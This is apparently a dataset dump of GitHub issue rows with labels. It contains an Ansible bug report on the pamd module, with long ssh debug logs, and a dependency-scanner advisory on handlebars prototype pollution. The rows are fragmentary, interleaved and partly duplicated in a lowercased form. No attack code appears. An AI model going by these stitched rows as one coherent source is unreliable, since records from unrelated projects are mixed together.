<ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'\r\n{"changed": false, "ansible_facts": {"pamd": {"changed": false, "change_count": 0, "action": "updated", "backupdest": ""}}, "invocation": {"module_args": {"type": "session", "name": "common-session", "module_path": "pam_limits.so", "control": "required", "backup": true, "state": "updated", "path": "/etc/pam.d", "new_type": null, "new_control": null, "new_module_path": null, "module_arguments": null}}}\r\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\nShared connection to ec2-54-00-00-00.eu-central-1.compute.amazonaws.com closed.\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="/Users/user/.ssh/minerva-prime/minerva-frankfurt-default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'rm -f -r /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/ > /dev/null 2>&1 && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') ok: [test1] => { "ansible_facts": { "pamd": { "action": "updated", "backupdest": "", "change_count": 0, "changed": false } }, "changed": false, "invocation": { "module_args": { "backup": true, "control": "required", "module_arguments": null, "module_path": "pam_limits.so", "name": "common-session", "new_control": null, "new_module_path": null, "new_type": null, "path": "/etc/pam.d", "state": "updated", "type": "session" } } } META: ran handlers META: ran handlers ```
True
pamd module doesn't update common-session file - ##### SUMMARY I am trying to add a pam.d module to common-session using pamd module Task pass ok, nothing is happening. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME pamd ##### ANSIBLE VERSION ``` ansible 2.7.1 config file = None configured module search path = ['/Users/user/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /usr/local/Cellar/ansible/2.7.1/libexec/lib/python3.7/site-packages/ansible executable location = /usr/local/bin/ansible python version = 3.7.0 (default, Sep 18 2018, 18:47:08) [Clang 10.0.0 (clang-1000.10.43.1)] ``` ##### CONFIGURATION ``` HOST_KEY_CHECKING(env: ANSIBLE_HOST_KEY_CHECKING) = False ``` ##### OS / ENVIRONMENT Target OS: Ubuntu 18.04 LTS running on AWS ##### STEPS TO REPRODUCE Run playbook with a role that runs this task <!--- Paste example playbooks or commands between quotes below --> ```yaml --- - name: Added pam_limits module become: yes pamd: type: session name: common-session module_path: pam_limits.so control: required backup: yes ``` ##### EXPECTED RESULTS Expect seeing in `/etc/pam.d/common-session` the entry ``` session required pam_limits.so ``` ##### ACTUAL RESULTS No entry added in `/etc/pam.d/common-session` ``` TASK [oslimits : Added pam_limits module] **************************************************************************************************************************************** task path: /Users/user/github/user/ansible/roles/oslimits/tasks/session.yml:2 <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'echo ~ubuntu && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'/home/ubuntu\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'( umask 77 && mkdir -p "` echo /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715 `" && echo ansible-tmp-1540760027.205646-268627155789715="` echo /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715 `" ) && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'ansible-tmp-1540760027.205646-268627155789715=/home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') Using module file /usr/local/Cellar/ansible/2.7.1/libexec/lib/python3.7/site-packages/ansible/modules/system/pamd.py <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> PUT /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp TO /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC sftp -b - -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 '[ec2-54-00-00-00.eu-central-1.compute.amazonaws.com]' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'sftp> put /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug2: Remote version: 3\r\ndebug2: Server supports extension "posix-rename@openssh.com" revision 1\r\ndebug2: Server supports extension "statvfs@openssh.com" revision 2\r\ndebug2: Server supports extension "fstatvfs@openssh.com" revision 2\r\ndebug2: Server supports extension "hardlink@openssh.com" revision 1\r\ndebug2: Server supports extension "fsync@openssh.com" revision 1\r\ndebug3: Sent message fd 3 T:16 I:1\r\ndebug3: SSH_FXP_REALPATH . -> /home/ubuntu size 0\r\ndebug3: Looking up /Users/user/.ansible/tmp/ansible-local-432871i84_61/tmplsws36wp\r\ndebug3: Sent message fd 3 T:17 I:2\r\ndebug3: Received stat reply T:101 I:2\r\ndebug1: Couldn\'t stat remote file: No such file or directory\r\ndebug3: Sent message SSH2_FXP_OPEN I:3 P:/home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py\r\ndebug3: Sent message SSH2_FXP_WRITE I:4 O:0 S:32768\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 4 32768 bytes at 0\r\ndebug3: Sent message SSH2_FXP_WRITE I:5 O:32768 S:32768\r\ndebug3: Sent message SSH2_FXP_WRITE I:6 O:65536 S:11453\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 5 32768 bytes at 32768\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: In write loop, ack for 6 11453 bytes at 65536\r\ndebug3: Sent message SSH2_FXP_CLOSE I:4\r\ndebug3: SSH2_FXP_STATUS 0\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'chmod u+x /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/ /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 -tt ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'sudo -H -S -n -u root /bin/sh -c '"'"'"'"'"'"'"'"'echo BECOME-SUCCESS-hgdzwkselssyvarkpelisbqztplobhng; /usr/bin/python3 /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/AnsiballZ_pamd.py'"'"'"'"'"'"'"'"' && sleep 0'"'"'' Escalation succeeded <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'\r\n{"changed": false, "ansible_facts": {"pamd": {"changed": false, "change_count": 0, "action": "updated", "backupdest": ""}}, "invocation": {"module_args": {"type": "session", "name": "common-session", "module_path": "pam_limits.so", "control": "required", "backup": true, "state": "updated", "path": "/etc/pam.d", "new_type": null, "new_control": null, "new_module_path": null, "module_arguments": null}}}\r\n', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\nShared connection to ec2-54-00-00-00.eu-central-1.compute.amazonaws.com closed.\r\n') <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> ESTABLISH SSH CONNECTION FOR USER: ubuntu <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> SSH: EXEC ssh -vvv -C -o ControlMaster=auto -o ControlPersist=60s -o StrictHostKeyChecking=no -o 'IdentityFile="/Users/user/.ssh/minerva-prime/minerva-frankfurt-default.pem"' -o KbdInteractiveAuthentication=no -o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey -o PasswordAuthentication=no -o User=ubuntu -o ConnectTimeout=10 -o ControlPath=/Users/user/.ansible/cp/6acc941124 ec2-54-00-00-00.eu-central-1.compute.amazonaws.com '/bin/sh -c '"'"'rm -f -r /home/ubuntu/.ansible/tmp/ansible-tmp-1540760027.205646-268627155789715/ > /dev/null 2>&1 && sleep 0'"'"'' <ec2-54-00-00-00.eu-central-1.compute.amazonaws.com> (0, b'', b'OpenSSH_7.7p1, LibreSSL 2.7.3\r\ndebug1: Reading configuration data /etc/ssh/ssh_config\r\ndebug1: /etc/ssh/ssh_config line 48: Applying options for *\r\ndebug1: auto-mux: Trying existing master\r\ndebug2: fd 3 setting O_NONBLOCK\r\ndebug2: mux_client_hello_exchange: master version 4\r\ndebug3: mux_client_forwards: request forwardings: 0 local, 0 remote\r\ndebug3: mux_client_request_session: entering\r\ndebug3: mux_client_request_alive: entering\r\ndebug3: mux_client_request_alive: done pid = 4243\r\ndebug3: mux_client_request_session: session request sent\r\ndebug1: mux_client_request_session: master session id: 2\r\ndebug3: mux_client_read_packet: read header failed: Broken pipe\r\ndebug2: Received exit status from master 0\r\n') ok: [test1] => { "ansible_facts": { "pamd": { "action": "updated", "backupdest": "", "change_count": 0, "changed": false } }, "changed": false, "invocation": { "module_args": { "backup": true, "control": "required", "module_arguments": null, "module_path": "pam_limits.so", "name": "common-session", "new_control": null, "new_module_path": null, "new_type": null, "path": "/etc/pam.d", "state": "updated", "type": "session" } } } META: ran handlers META: ran handlers ```
main
pamd module doesn t update common session file summary i am trying to add a pam d module to common session using pamd module task pass ok nothing is happening issue type bug report component name pamd ansible version ansible config file none configured module search path ansible python module location usr local cellar ansible libexec lib site packages ansible executable location usr local bin ansible python version default sep configuration host key checking env ansible host key checking false os environment target os ubuntu lts running on aws steps to reproduce run playbook with a role that runs this task yaml name added pam limits module become yes pamd type session name common session module path pam limits so control required backup yes expected results expect seeing in etc pam d common session the entry session required pam limits so actual results no entry added in etc pam d common session task task path users user github user ansible roles oslimits tasks session yml establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp eu central compute amazonaws com bin sh c echo ubuntu sleep b home ubuntu n b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r n establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp eu central compute amazonaws com bin sh c umask mkdir p echo home ubuntu ansible tmp ansible tmp echo ansible tmp echo home ubuntu ansible tmp ansible tmp sleep b ansible tmp home ubuntu ansible tmp ansible tmp n b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r n using module file usr local cellar ansible libexec lib site packages ansible modules system pamd py put users user ansible tmp ansible local to home ubuntu ansible tmp ansible tmp ansiballz pamd py ssh exec sftp b vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp b sftp put users user ansible tmp ansible local home ubuntu ansible tmp ansible tmp ansiballz pamd py n b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r remote version r server supports extension posix rename openssh com revision r server supports extension statvfs openssh com revision r server supports extension fstatvfs openssh com revision r server supports extension hardlink openssh com revision r server supports extension fsync openssh com revision r sent message fd t i r ssh fxp realpath home ubuntu size r looking up users user ansible tmp ansible local r sent message fd t i r received stat reply t i r couldn t stat remote file no such file or directory r sent message fxp open i p home ubuntu ansible tmp ansible tmp ansiballz pamd py r sent message fxp write i o s r fxp status r in write loop ack for bytes at r sent message fxp write i o s r sent message fxp write i o s r fxp status r in write loop ack for bytes at r fxp status r in write loop ack for bytes at r sent message fxp close i r fxp status r mux client read packet read header failed broken pipe r received exit status from master r n establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp eu central compute amazonaws com bin sh c chmod u x home ubuntu ansible tmp ansible tmp home ubuntu ansible tmp ansible tmp ansiballz pamd py sleep b b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r n establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp tt eu central compute amazonaws com bin sh c sudo h s n u root bin sh c echo become success hgdzwkselssyvarkpelisbqztplobhng usr bin home ubuntu ansible tmp ansible tmp ansiballz pamd py sleep escalation succeeded b r n changed false ansible facts pamd changed false change count action updated backupdest invocation module args type session name common session module path pam limits so control required backup true state updated path etc pam d new type null new control null new module path null module arguments null r n b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r nshared connection to eu central compute amazonaws com closed r n establish ssh connection for user ubuntu ssh exec ssh vvv c o controlmaster auto o controlpersist o stricthostkeychecking no o identityfile users user ssh minerva prime minerva frankfurt default pem o kbdinteractiveauthentication no o preferredauthentications gssapi with mic gssapi keyex hostbased publickey o passwordauthentication no o user ubuntu o connecttimeout o controlpath users user ansible cp eu central compute amazonaws com bin sh c rm f r home ubuntu ansible tmp ansible tmp dev null sleep b b openssh libressl r reading configuration data etc ssh ssh config r etc ssh ssh config line applying options for r auto mux trying existing master r fd setting o nonblock r mux client hello exchange master version r mux client forwards request forwardings local remote r mux client request session entering r mux client request alive entering r mux client request alive done pid r mux client request session session request sent r mux client request session master session id r mux client read packet read header failed broken pipe r received exit status from master r n ok ansible facts pamd action updated backupdest change count changed false changed false invocation module args backup true control required module arguments null module path pam limits so name common session new control null new module path null new type null path etc pam d state updated type session meta ran handlers meta ran handlers
1
199,950
22,739,345,983
IssuesEvent
2022-07-07 01:03:50
howlr-me/howlr-front
https://api.github.com/repos/howlr-me/howlr-front
opened
WS-2020-0450 (Medium) detected in handlebars-4.1.2.tgz
security vulnerability
## WS-2020-0450 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.1.2.tgz</b></p></summary> <p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p> <p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz</a></p> <p>Path to dependency file: /howlr-front/package.json</p> <p>Path to vulnerable library: /node_modules/handlebars/package.json</p> <p> Dependency Hierarchy: - react-scripts-3.0.1.tgz (Root Library) - jest-24.7.1.tgz - jest-cli-24.8.0.tgz - core-24.8.0.tgz - reporters-24.8.0.tgz - istanbul-reports-2.2.6.tgz - :x: **handlebars-4.1.2.tgz** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://api.github.com/repos/howlr-me/howlr-front/commits/aefbb4fb9899e9aedf8d3f10a36a31a07cc365dc">aefbb4fb9899e9aedf8d3f10a36a31a07cc365dc</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> Handlebars before 4.6.0 vulnerable to Prototype Pollution. Prototype access to the template engine allows for potential code execution, which may lead to Denial Of Service (DoS). <p>Publish Date: 2020-01-09 <p>URL: <a href=https://github.com/handlebars-lang/handlebars.js/commit/33a3b46bc205f768f8edbc67241c68591fe3472c>WS-2020-0450</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Release Date: 2020-01-09</p> <p>Fix Resolution (handlebars): 4.6.0</p> <p>Direct dependency fix Resolution (react-scripts): 3.1.0</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
WS-2020-0450 (Medium) detected in handlebars-4.1.2.tgz - ## WS-2020-0450 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.1.2.tgz</b></p></summary> <p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p> <p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.1.2.tgz</a></p> <p>Path to dependency file: /howlr-front/package.json</p> <p>Path to vulnerable library: /node_modules/handlebars/package.json</p> <p> Dependency Hierarchy: - react-scripts-3.0.1.tgz (Root Library) - jest-24.7.1.tgz - jest-cli-24.8.0.tgz - core-24.8.0.tgz - reporters-24.8.0.tgz - istanbul-reports-2.2.6.tgz - :x: **handlebars-4.1.2.tgz** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://api.github.com/repos/howlr-me/howlr-front/commits/aefbb4fb9899e9aedf8d3f10a36a31a07cc365dc">aefbb4fb9899e9aedf8d3f10a36a31a07cc365dc</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> Handlebars before 4.6.0 vulnerable to Prototype Pollution. Prototype access to the template engine allows for potential code execution, which may lead to Denial Of Service (DoS). <p>Publish Date: 2020-01-09 <p>URL: <a href=https://github.com/handlebars-lang/handlebars.js/commit/33a3b46bc205f768f8edbc67241c68591fe3472c>WS-2020-0450</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Release Date: 2020-01-09</p> <p>Fix Resolution (handlebars): 4.6.0</p> <p>Direct dependency fix Resolution (react-scripts): 3.1.0</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_main
ws medium detected in handlebars tgz ws medium severity vulnerability vulnerable library handlebars tgz handlebars provides the power necessary to let you build semantic templates effectively with no frustration library home page a href path to dependency file howlr front package json path to vulnerable library node modules handlebars package json dependency hierarchy react scripts tgz root library jest tgz jest cli tgz core tgz reporters tgz istanbul reports tgz x handlebars tgz vulnerable library found in head commit a href vulnerability details handlebars before vulnerable to prototype pollution prototype access to the template engine allows for potential code execution which may lead to denial of service dos publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required none user interaction required scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href suggested fix type upgrade version release date fix resolution handlebars direct dependency fix resolution react scripts step up your open source security game with mend
0
179,456
13,881,761,957
IssuesEvent
2020-10-18 02:28:21
rust-lang/rust
https://api.github.com/repos/rust-lang/rust
closed
unexpected panic when trait not implemented
C-bug E-needs-test I-ICE P-medium T-compiler glacier
